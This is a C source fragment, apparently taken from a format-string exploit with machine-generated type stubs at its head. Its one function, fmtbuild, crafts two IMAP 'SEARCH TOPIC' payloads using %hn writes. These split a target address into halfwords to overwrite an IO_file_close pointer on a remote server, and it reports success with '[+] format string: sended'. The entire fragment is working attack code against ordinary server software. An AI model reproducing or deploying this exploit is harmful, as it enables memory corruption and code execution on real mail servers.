
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int addr; int IO_file_close; int offset; } ;


 int* b ;
 int exit (int) ;
 int i ;
 int memset (int*,int,int) ;
 int perror (char*) ;
 int puts (char*) ;
 int recv (int,int*,int,int ) ;
 int send (int,int*,int ,int ) ;
 int snprintf (int*,int,char*,unsigned char,unsigned char,unsigned char,unsigned char,int,int ) ;
 int strlen (int*) ;
 int * strstr (int*,char*) ;
 TYPE_1__ v ;

void fmtbuild(int fd){
 unsigned char b0, b1, b2, b3;
 int a1, a2;
 a1 = (v.addr & 0xffff0000) >> 16;
 a2 = (v.addr & 0x0000ffff);
 b0 = (v.IO_file_close >> 24) & 0xff;
 b1 = (v.IO_file_close >> 16) & 0xff;
 b2 = (v.IO_file_close >> 8) & 0xff;
 b3 = (v.IO_file_close) & 0xff;
 snprintf(b, sizeof b, "3 SEARCH TOPIC "
      "A"
      "%c%c%c%c"
      "%%.%hdx"
      "%%%d$hn\n",
      b3 + 2, b2, b1, b0,
      a1 - 0x24,
      v.offset);
 if(send(fd, b, strlen(b), 0) == -1){
  perror("[-] send()");
  exit(1);
 }
 while((i = recv(fd, b, 1023, 0)) != -1){
  b[i] = 0x0;
  if(strstr(b, "BAD") != ((void*)0))
   break;
 }
 memset(b, 0x0, 1024);
 snprintf(b, sizeof b, "3 SEARCH TOPIC "
      "A"
      "%c%c%c%c"
      "%%.%hdx"
      "%%%d$hn\n",
      b3, b2, b1, b0,
      a2 - 0x24,
      v.offset);
 if(send(fd, b, strlen(b), 0) == -1){
  perror("[-] send()");
  exit(1);
 }
 while((i = recv(fd, b, 1023, 0)) != -1){
  b[i] = 0x0;
  if(strstr(b, "BAD") != ((void*)0))
   break;
 }
 puts("[+] format string: sended");
 return;
}
